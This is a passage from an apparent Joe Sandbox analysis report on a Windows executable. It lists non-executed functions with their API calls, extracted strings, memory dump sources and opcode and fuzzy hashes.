                                                                    • Opcode Fuzzy Hash: e0c595537bb59da188e83d34aeadfb6be3b50c555a022c7b95508cfac1463621
                                                                    • Instruction Fuzzy Hash: 75A011822B8222BC3228BAA03E02E3A020CC0C2F20330880AF80280882A88008A82032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00221050 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindResourceW.KERNEL32(00000000,00000084,FLAGS), ref: 0022106D
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00221075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoad
                                                                    • String ID: FLAGS$net451$net452$net46$net461$net462$net47$net471$net472$net48
                                                                    • API String ID: 2619053042-95551373
                                                                    • Opcode ID: 8eaf369a497ecece7456ef7615fce3794c86b6c4eae3f1a529759a40a4d0d84c
                                                                    • Instruction ID: 54d9c3a94872f9628e443ed61ea8641725c5628ee5e76cc5b1800d44d47c6c68
                                                                    • Opcode Fuzzy Hash: 8eaf369a497ecece7456ef7615fce3794c86b6c4eae3f1a529759a40a4d0d84c
                                                                    • Instruction Fuzzy Hash: 51217420A70235B5D725EBE4FD53FBD76749F71B44F000066FD06A50C5EBB09AB58941
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00225758 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 404timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 002249CC: SetFilePointer.KERNEL32(?,?,00000000,?), ref: 002249FF
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104), ref: 002258E1
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00225917
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022592D
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022593E
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022594F
                                                                    • SystemTimeToFileTime.KERNEL32(?,00000001), ref: 00225ACF
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00225AFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime_wcsstr$ByteCharLocalMultiPointerSystemWide
                                                                    • String ID: /../$/..\$\../$\..\
                                                                    • API String ID: 2500941349-3885502717
                                                                    • Opcode ID: ccfb54aac593e09cf2c4910bbe94b13801a3316f1b0d71e545bd7994ea2e000c
                                                                    • Instruction ID: cccfb67eccd489e70cdd3b447fda1a6cecf21413275ff0ff743e9f6036d71be5
                                                                    • Opcode Fuzzy Hash: ccfb54aac593e09cf2c4910bbe94b13801a3316f1b0d71e545bd7994ea2e000c
                                                                    • Instruction Fuzzy Hash: 67F14A71528B619FD724CF64D4803A6BBE0EF85310F148A3EE8A9CB292D774D951CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022A3EF Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0022A50E,0023F38C,00000017), ref: 0022A3F4
                                                                    • UnhandledExceptionFilter.KERNEL32(0023F38C,?,0022A50E,0023F38C,00000017), ref: 0022A3FD
                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,0022A50E,0023F38C,00000017), ref: 0022A408
                                                                    • TerminateProcess.KERNEL32(00000000,?,0022A50E,0023F38C,00000017), ref: 0022A40F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                    • String ID:
                                                                    • API String ID: 3231755760-0
                                                                    • Opcode ID: 112fe3665ae4b44b7b313a791eae05bf219df623a7df8ffc44dcca58fe7eaf7f
                                                                    • Instruction ID: dd56fe1d628fb9a360f7a0a04bc752680b19c1cafba83f26f6f0e997c71bd08b
                                                                    • Opcode Fuzzy Hash: 112fe3665ae4b44b7b313a791eae05bf219df623a7df8ffc44dcca58fe7eaf7f
                                                                    • Instruction Fuzzy Hash: 47D01235810504ABC7842BE8FF0CE483F28EB14A52F008020F70B81036EB3144008B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00222FF0 Relevance: 5.8, Strings: 4, Instructions: 783COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4j$$4j$$4j$$4j$
                                                                    • API String ID: 0-9538948
                                                                    • Opcode ID: 7a305fccb4f8ff2fa544fbe02267f4fbaa4b2ef3f0021de223a00c2f5989f049
                                                                    • Instruction ID: dbfa728649b1735cb6ee3b808deebe7e2c53e7815bae90200e1887d4b5ae9d67
                                                                    • Opcode Fuzzy Hash: 7a305fccb4f8ff2fa544fbe02267f4fbaa4b2ef3f0021de223a00c2f5989f049
                                                                    • Instruction Fuzzy Hash: D262D7B1A1021AEFCF08CF99D9946ADBBF1FB48310F248169D815EB245D778DA61CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022A2FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00221BDC: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BE2
                                                                      • Part of subcall function 00221BDC: GetLastError.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BEC
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00221037), ref: 0022A332
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00221037), ref: 0022A341
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0022A33C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3511171328-631824599
                                                                    • Opcode ID: 682e8c45fd5035fc9b22a74cde587b20f7beba8c592c1bc9476cdc25e8f1609f
                                                                    • Instruction ID: 70fc4ba8cc7b754bffce040008e53293f647eef2bb8f99e62bf74b1249ff0b07
                                                                    • Opcode Fuzzy Hash: 682e8c45fd5035fc9b22a74cde587b20f7beba8c592c1bc9476cdc25e8f1609f
                                                                    • Instruction Fuzzy Hash: FDE092B0620361DFD370DFA9F948742BBE4AF04704F00896EE886C2A51EBB1D454CF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022DED4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0022DFCC
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0022DFD6
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0022DFE3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 17c2f6bc87714b32215f4aa2874540c6a88caafd999edebe90d6ed5be55e521e
                                                                    • Instruction ID: d615f6f3dd1f7a885452db1cf3ad353713f9805146466340e139b19f57543079
                                                                    • Opcode Fuzzy Hash: 17c2f6bc87714b32215f4aa2874540c6a88caafd999edebe90d6ed5be55e521e
                                                                    • Instruction Fuzzy Hash: E931F57491122CABCB21DF68ED88B8DB7B8BF08310F5045EAE41CA7251EB709B958F44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00237F40 Relevance: 3.5, APIs: 2, Instructions: 452COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5564b015ab91444fb6e25ec2cec9df0838bde758e816cfb912a8106d78ab93b8
                                                                    • Instruction ID: 29526ff7b30ed7e7fc20b89eff3465b346782699a037fcdd3a37f0a91aa8facb
                                                                    • Opcode Fuzzy Hash: 5564b015ab91444fb6e25ec2cec9df0838bde758e816cfb912a8106d78ab93b8
                                                                    • Instruction Fuzzy Hash: E00230B1E102199FDF14CFA8C9806AEF7B1FF88314F158269E919AB340DB319D15CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002384D7 Relevance: 2.7, APIs: 1, Instructions: 1242COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID:
                                                                    • API String ID: 4168288129-0
                                                                    • Opcode ID: 3988972555a3914d4f552b78c153b26e9f772ea77f83d2b8f6d8b7ee294d7ccb
                                                                    • Instruction ID: 6564ac8b252b35d000327f41438a688e87d1ad2fbc0cb8938ef5915ccef3c9da
                                                                    • Opcode Fuzzy Hash: 3988972555a3914d4f552b78c153b26e9f772ea77f83d2b8f6d8b7ee294d7ccb
                                                                    • Instruction Fuzzy Hash: B1B24FB1E246298FDB25CF28DD407E9B3B9EB45305F1441EAE84DE7240EB74AE918F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00235564 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8357e701704bd286eba01913299d8cfa5792a4075659a3f6f56b7c1b144d6e3c
                                                                    • Instruction ID: 302f4f8bedfca59498fb6d5dc5a6da6b419c8f819192e34773d22f26dfb347a0
                                                                    • Opcode Fuzzy Hash: 8357e701704bd286eba01913299d8cfa5792a4075659a3f6f56b7c1b144d6e3c
                                                                    • Instruction Fuzzy Hash: 48312BB2910629AFCB24DFA9DC89DBBB7BDEB84310F544558F80997241EA30EE50CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022465F Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Pi$
                                                                    • API String ID: 0-465683357
                                                                    • Opcode ID: 7cd034ef39ec13c9faba5c902957bb3e55b9d9bdc548bca88db9b37e897b887c
                                                                    • Instruction ID: 266b4be816da2cb5f9c0bb63a67e8fd179e82eae9282118bcb537647f4e80988
                                                                    • Opcode Fuzzy Hash: 7cd034ef39ec13c9faba5c902957bb3e55b9d9bdc548bca88db9b37e897b887c
                                                                    • Instruction Fuzzy Hash: 92B144B1620B51DFD334DF19D880A22B7F5FF4A314B208A5ED4AA8B691D731E816CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022AFBB Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(0022AFC7,0022A9D3), ref: 0022AFC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 60f563e9c6eb23d13b247d2fab119a662be281cd217a29a7f40e4044dba7f2dd
                                                                    • Instruction ID: 6049d46bc194ac4079a21f0a10189e12009db9210b0078724fcf89a814bac283
                                                                    • Opcode Fuzzy Hash: 60f563e9c6eb23d13b247d2fab119a662be281cd217a29a7f40e4044dba7f2dd
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00236580 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 3a8723126d6e11ca63e76d2f99a1aa103bed96938cdf1ca3b944493a57602056
                                                                    • Instruction ID: 63e0f51636bcc39a53f8c0ff52d9c8edc3bc15110a83a114a609035ff103efef
                                                                    • Opcode Fuzzy Hash: 3a8723126d6e11ca63e76d2f99a1aa103bed96938cdf1ca3b944493a57602056
                                                                    • Instruction Fuzzy Hash: 63A00174A01209CBD7819F36BA0D2093AE9BA4A6D57468269A459C9260EB2484549A01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002238F8 Relevance: .4, Instructions: 357COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9fe7f6900c6f7c013b8d75031284f10138300f96d9a4ec1004a8520ec9095fdf
                                                                    • Instruction ID: 9a54a3eda5e0815dc56c2e89e2b24c8b5162eea0edd3ad19cf8594304ee9bb2a
                                                                    • Opcode Fuzzy Hash: 9fe7f6900c6f7c013b8d75031284f10138300f96d9a4ec1004a8520ec9095fdf
                                                                    • Instruction Fuzzy Hash: 39F10375A102299FDB24CF68D980B9DB7B2BB89304F1081EAD58DE7341DB74AE91CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023BBC8 Relevance: .1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6700121d7e8bee462397dff6ff94a5cea978c28eed108508b41e96bb11bd646e
                                                                    • Instruction ID: 94de2e51c0620362abbe0ab30386a773c08a732110fe943fc4104a6243fa14a6
                                                                    • Opcode Fuzzy Hash: 6700121d7e8bee462397dff6ff94a5cea978c28eed108508b41e96bb11bd646e
                                                                    • Instruction Fuzzy Hash: 4221B673F204384B770CC47E8C5627DB6E1C78C501745427AF8A6DA3C1E968D927E2E4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023BAA4 Relevance: .1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6711eacfec799d691f0b413820fdf3235107d9c8906fccb1249b6a3bed6472a8
                                                                    • Instruction ID: ce4b5c85a925595ba5a473de482f47790dd501d6bef176f3ca2c017f01356c76
                                                                    • Opcode Fuzzy Hash: 6711eacfec799d691f0b413820fdf3235107d9c8906fccb1249b6a3bed6472a8
                                                                    • Instruction Fuzzy Hash: B411A723F30C295B275C81BD8C1727AA2D2EBD825070F533ADC26E7284E994DE23D290
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002242C9 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d17e56e18889d4f7e20cdd0943c400e1cbef53da39deaceea940c3e5eb54d39e
                                                                    • Instruction ID: 16e228825427250e9c1d4ae6ef4ea43e58e5cb35bb687d4bd3ec83a5c2adcca2
                                                                    • Opcode Fuzzy Hash: d17e56e18889d4f7e20cdd0943c400e1cbef53da39deaceea940c3e5eb54d39e
                                                                    • Instruction Fuzzy Hash: 532154349350B25B960D8A7ABC25536BB909B472033CB42ABF9CFE90C3C529D520D7B0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002352EB Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b49f341b2c4d21b5e45a47f73c39f37c7c68b2ac7f0d8e66cdc5e13c3d45f41
                                                                    • Instruction ID: 0a98d672516f93609ad8ec761697736e4e0e7940733c76ddadb82133028d52f0
                                                                    • Opcode Fuzzy Hash: 9b49f341b2c4d21b5e45a47f73c39f37c7c68b2ac7f0d8e66cdc5e13c3d45f41
                                                                    • Instruction Fuzzy Hash: E4E04672921238EBC724EA988904A9AF3ACEB09B50F1545DABA08D3200C2B0DE11CBD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002212B1 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f60b9b7729f7a7d05f9c4a559724aad1ad6defe8a85ef7417c8ebcd30f4f9094
                                                                    • Instruction ID: 82779d70cfb9e3e37b872f9f4b04bb319360843fb76661911dde7db61a1c6c64
                                                                    • Opcode Fuzzy Hash: f60b9b7729f7a7d05f9c4a559724aad1ad6defe8a85ef7417c8ebcd30f4f9094
